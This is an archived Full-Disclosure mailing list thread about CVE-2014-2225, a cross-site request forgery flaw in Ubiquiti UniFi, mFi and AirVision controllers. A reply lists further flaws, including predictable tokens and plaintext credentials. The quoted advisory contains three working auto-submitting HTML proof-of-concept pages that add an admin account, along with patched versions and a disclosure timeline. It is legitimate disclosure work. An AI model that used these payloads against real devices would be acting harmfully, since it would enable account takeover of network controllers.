lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <CAFThDPGwA-=Cacm+PHRJ1p0q6vfJdbCFmbn8PDrL866DvzMhFg@mail.gmail.com>
Date: Thu, 24 Jul 2014 13:59:22 -0700
From: Luca Carettoni <luca.carettoni@...isoft.com>
To: Seth Art <sethsec@...il.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] CVE-2014-2225: Ubiquiti Networks - Multiple products -
 Cross-site Request Forgery (CSRF)

This is interesting. Ubiquiti knew about this issue since last year.

On 26 Sep 2013, I reported to them the following vulnerabilities
affecting UniFi Controller:

http://www.ikkisoft.com/stuff/UnifiSecurityBugs_Sep2013.pdf

#1 Insecure Java Random() to generate secret tokens
This was fixed in 3.1.5 as "security enhancements". See
http://pastebin.com/Xt0hVCPr for the change log.
java.util.Random was used across the entire codebase to generate
secret tokens, such as session cookies,
AP auth keys and reset tokens. Under some circumstances, it was
practical to predict the reset password
token and compromise the admin account, which would lead to full
compromise of the entire platform.

#2 System-wise Cross Site Request Forgery
In addition to the pdf detailing the vulns, I've shared with them a
PoC with the exact same attack.
After a few emails, trying to explain the criticality of CSRF in this
context, I simply gave up.

#3 Change password does not require old password
#4 Frameable response (ClickJacking)
#5 Credentials are saved in plain-text within MongoDB
#6 Multiple Cross-Site Scripting vulnerabilities (Stored and
Reflected) in /api/, abusing IE content sniffing

As far as I know, these are still open.

In addition, I've asked them to obtain CVEs for those vulnerabilities.
On Oct 30th, they confirmed that they would be disclosed to be public:
"Good point about CVE, we'll request an ID and disclose them later.
Will also address V2."

I don't think that CVEs have ever been assigned to these issues,
neither Ubiquiti has published those details
in a security advisory.

Cheers!
@_ikki


On Wed, Jul 23, 2014 at 8:58 PM, Seth Art <sethsec@...il.com> wrote:
> -----------
> Vendor:
> -----------
> Ubiquiti Networks (http://www.ubnt.com/)
>
> -----------------------------------------
> Affected Products/Versions:
> -----------------------------------------
> UniFi Controller v2.4.6
> mFi Controller v2.0.15
> AirVision Controller v2.1.3
> Note: Previous versions may be affected
>
> -----------------
> Description:
> -----------------
> Title: Cross-site Request Forgery (CSRF)
> CVE: CVE-2014-2225
> CWE: http://cwe.mitre.org/data/definitions/352.html
> Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html
> Researcher: Seth Art - @sethsec
>
> ---------------
> UniFi POC:
> ---------------
>
> <html>
> <head>
> <script>
> function sendCSRF()
> {
> var url_base = "https://192.168.0.106:8443/api/add/admin"
> var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
>
> var xmlhttp;
> xmlhttp = new XMLHttpRequest();
> xmlhttp.open("POST", url_base, true);
> xmlhttp.setRequestHeader("Accept","*/*");
> xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
> charset=UTF-8");
> xmlhttp.withCredentials= "true";
> xmlhttp.send(post_data);
> }
>
> </script>
> </head>
> <body>
> <h1>CSRF POC</h1>
> Sending CSRF Payload!!!
> <body onload="sendCSRF()">
> </body>
>
> -------------
> mFi POC:
> -------------
> <html>
> <head>
> <script>
> function sendCSRF()
> {
> var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"
> var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
>
> var xmlhttp;
> xmlhttp = new XMLHttpRequest();
> xmlhttp.open("POST", url_base, true);
> xmlhttp.setRequestHeader("Accept","*/*");
> xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
> charset=UTF-8");
> xmlhttp.withCredentials= "true";
> xmlhttp.send(post_data);
> }
>
> </script>
> </head>
> <body>
> <h1>CSRF POC</h1>
> Sending CSRF Payload!!!
> <body onload="sendCSRF()">
> </body>
>
>
> --------------------
> AirVision POC:
> --------------------
> <html>
> <head>
> <script>
> function sendCSRF()
> {
> var url_base = "https://192.168.0.106:7443/api/v2.0/admin"
> var post_data="{\”name\”:\”csrf\”,\”email\”:\”csrf@...il.com\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”
>
> var xmlhttp;
> xmlhttp = new XMLHttpRequest();
> xmlhttp.open("POST", url_base, true);
> xmlhttp.setRequestHeader("Accept","*/*");
> xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");
> xmlhttp.withCredentials= "true";
> xmlhttp.send(post_data);
> }
>
> </script>
> </head>
> <body>
> <h1>CSRF POC</h1>
> Sending CSRF Payload!!!
> <body onload="sendCSRF()">
> </body>
>
>
>
> -------------
> Solution:
> -------------
> UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater
> mFi Controller - Upgrade to mFi Controller v2.0.24 or greater
> AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:
> The application name changed from AirVision to UniFi Video)
>
> -----------------------------
> Disclosure Timeline:
> -----------------------------
> 2014-02-16: Notified Ubiquiti of vulnerabilities in UniFi and mFi products
> 2014-02-17: Ubiquiti acknowledges and requests details
> 2014-02-17: Report with POC sent to Ubiquiti
> 2014-02-19: Asked Ubiquiti to confirm receipt of report
> 2014-02-19: Ubiquti confirms receipt of report and existence of the
> vulnerabilities
> 2014-02-25: Notified Ubiquiti of CSRF vulnerability in AirVision product
> 2014-02-19: Ubiquti confirms receipt of AirVision report and existence
> of the vulnerability
> 2014-02-28: CVE-2014-2225 assigned
> 2014-03-12: Requested status update
> 2014-03-27: Requested status update
> 2014-04-07: Requested status update, mention that we might need to
> bring in a CERT
> 2014-04-09: Ubiquiti provides timeline for solution
> 2014-04-18: UniFi Video 3.0.1 is released
> 2014-05-30: Requested a status update on the remaining two products
> 2014-06-12: Requested a status update on the remaining two products
> 2014-06-12: mFi v2.0.24 and UniFi 3.2.1 are released
> 2014-06-13: Set public disclosure date of 2014-07-24 and notified vendor
> 2014-07-24: Public disclosure

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ